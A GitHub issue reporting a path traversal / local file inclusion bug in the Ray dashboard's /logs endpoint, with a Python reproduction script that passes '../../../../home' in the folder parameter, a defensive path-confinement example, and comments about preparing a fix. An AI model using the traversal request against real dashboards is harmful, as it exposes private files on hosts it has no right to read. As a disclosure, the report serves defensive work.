
Ray Dashboard is susceptible to a Local File Inclusion bug with default settings

Open rmhowe425 opened this issue 1 year ago • 5 comments

What happened + What you expected to happen

Description

Just as the title suggests, when initially starting up the Ray dashboard I can parse my local file system by supplying the folder HTTP parameter in GET requests to the /logs API endpoint in conjunction with relative file paths.

Expected Behavior

As a best practice, relative file paths should not be permitted, or should be ignored. Basic access controls should be implemented to prevent unauthorized users from being able to parse the underlying file system being used by Ray.

Useful Information

  1. Taking a cursory glance at the Ray GH Issues board, it appears that this issue was discussed (and addressed) here and here

  2. As seen in the provided script, the nodeId HTTP parameter must be included in GET requests.


Versions / Dependencies

2.9.1 and 2.23.0

Reproduction script

from requests import get

# Placeholders: <ip address> is the dashboard host, <nodeId> is a Ray node id
url = 'http://<ip address>:8265/#/logs'
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate, br, zstd',
}

# Relative path in the folder parameter; nodeId is required by the endpoint
params = {'folder': '../../../../home', 'nodeId': '<nodeId>'}

try:
    resp = get(url=url, params=params, headers=headers)
except Exception as e:
    # Stop here: resp is undefined if the request itself failed
    raise SystemExit(f'GET request failed: {str(e)}')

if resp.status_code != 200:
    print(f'ERROR server responded with: {resp.status_code}, {resp.content}')
else:
    print(f'Response\n==========\n{resp.content}')

Issue Severity

Medium: It is a significant difficulty but I can work around it.

rmhowe425, Jun 05 '24 12:06
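As an added example (not code from this issue or from Ray), the kind of root-confinement check the Expected Behavior section asks for: the requested folder is resolved against the log root and rejected if it lands anywhere else. The names log_root, resolve_log_folder, audit_folder_params and UnsafePath are assumptions, and the sample folder values are constructed for the demo.

```python
import os


class UnsafePath(ValueError):
    """Raised when a requested folder would escape the log root."""


def resolve_log_folder(log_root: str, folder: str) -> str:
    """Return an absolute path for `folder` that is guaranteed to lie under log_root.

    Rejects NUL bytes, absolute paths and any value (e.g. '../../../../home')
    that normalises to a location outside the root. realpath() also follows
    symlinks that exist on disk, so a symlink planted inside the root cannot
    point the lookup elsewhere.
    """
    root = os.path.realpath(log_root)
    if not folder:
        return root
    if "\x00" in folder or os.path.isabs(folder) or folder.startswith(("/", "\\")):
        raise UnsafePath(folder)
    candidate = os.path.realpath(os.path.join(root, folder))
    # commonpath, not startswith(): '/var/logs2' would pass a prefix test for '/var/logs'
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafePath(folder)
    return candidate


def audit_folder_params(log_root: str, folders: list[str]) -> dict[str, str]:
    """Classify each candidate `folder` value as 'allowed' or 'rejected'."""
    verdicts = {}
    for folder in folders:
        try:
            resolve_log_folder(log_root, folder)
            verdicts[folder] = "allowed"
        except UnsafePath:
            verdicts[folder] = "rejected"
    return verdicts


if __name__ == "__main__":
    # Constructed sample requests: one from the report above, plus benign and edge cases
    root = "/tmp/ray/session_latest/logs"
    for folder, verdict in audit_folder_params(
        root, ["../../../../home", "worker-1", "a/../b", "/etc", ""]
    ).items():
        print(f"{folder!r:22} -> {verdict}")
```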

@anyscalesam Happy to try and submit a PR for this issue

rmhowe425, Jun 20 '24 00:06

@anyscalesam I'll go ahead and draft up a PR for this issue

rmhowe425, Jun 26 '24 12:06

@rmhowe425 Thanks for reporting and taking this issue. I'll assign the issue to you, but please feel free to drop the assignment if you decide not to commit the PR. Do you mind linking back to this issue when you post the PR?

brycehuang30, Jun 26 '24 17:06

@brycehuang30 Absolutely!

rmhowe425, Jun 26 '24 17:06

@brycehuang30 @anyscalesam Hey guys n00b question here.

I'm going through the Setting up your Development Environment instructions and I'm having some issues. I followed the instructions for Preparing to build Ray on Linux and I'm trying to run the command: pip install -e . --verbose

However, towards the very end of the build my RAM (16 GB) is maxed out and my computer freezes up. Surely I'm not the only one to experience this problem. Any suggestions on steps that I can take to optimize the build process so that I can push forward with my contribution for this GH issue?

rmhowe425, Jun 29 '24 18:06

Cc @aslonnie

anyscalesam, Jul 02 '24 23:07